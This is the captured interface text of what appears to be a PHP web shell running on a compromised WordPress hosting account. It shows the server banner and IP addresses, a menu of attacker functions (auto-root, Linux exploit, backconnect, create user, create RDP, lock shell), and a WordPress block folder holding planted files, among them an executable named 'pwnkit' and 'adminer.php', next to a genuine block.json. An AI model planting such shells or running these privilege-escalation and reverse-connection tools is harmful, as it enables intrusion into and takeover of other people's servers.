Linux webm002.cluster120.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.120.20.2 | : 216.73.216.49
Cant Read [ /etc/named.conf ]
8.5.7
verseaumee
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
verseaumee /
maze /
wp-includes /
blocks /
playlist /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
adminer.php
0
B
-rw-r--r--
block.json
1.96
KB
-rw-r--r--
editor-rtl.css
99
B
-rw-r--r--
editor-rtl.min.css
84
B
-rw-r--r--
editor.css
99
B
-rw-r--r--
editor.min.css
84
B
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
style-rtl.css
11.3
KB
-rw-r--r--
style-rtl.min.css
9.22
KB
-rw-r--r--
style.css
11.3
KB
-rw-r--r--
style.min.css
9.22
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : block.json
{ "$schema": "https://schemas.wp.org/trunk/block.json", "apiVersion": 3, "name": "core/playlist", "title": "Playlist", "category": "media", "description": "Embed a simple playlist.", "keywords": [ "music", "sound" ], "textdomain": "default", "allowedBlocks": [ "core/playlist-track" ], "attributes": { "type": { "type": "string", "default": "audio" }, "order": { "type": "string", "default": "asc" }, "showTracklist": { "type": "boolean", "default": true }, "showImages": { "type": "boolean", "default": true }, "showPlayButtonArtwork": { "type": "boolean", "default": false }, "showArtists": { "type": "boolean", "default": true }, "showNumbers": { "type": "boolean", "default": true }, "showTrackLength": { "type": "boolean", "default": true }, "waveformStyle": { "type": "string", "enum": [ "bars", "mirror", "line", "blocks", "dots", "seekbar" ], "default": "bars" }, "waveformColor": { "type": "string" }, "waveformGradient": { "type": "string" }, "waveformBackgroundColor": { "type": "string" }, "waveformBackgroundGradient": { "type": "string" }, "caption": { "type": "string" } }, "providesContext": { "showArtists": "showArtists", "showImages": "showImages" }, "supports": { "anchor": true, "align": true, "__experimentalExposeControlsToChildren": true, "color": { "gradients": true, "link": true, "__experimentalDefaultControls": { "background": true, "text": true } }, "__experimentalBorder": { "color": true, "style": true, "width": true, "__experimentalDefaultControls": { "color": true, "style": true, "width": true } }, "interactivity": true, "spacing": { "margin": true, "padding": true }, "typography": { "fontSize": true, "__experimentalDefaultControls": { "fontSize": true } } }, "editorStyle": "wp-block-playlist-editor", "style": "wp-block-playlist" }
Close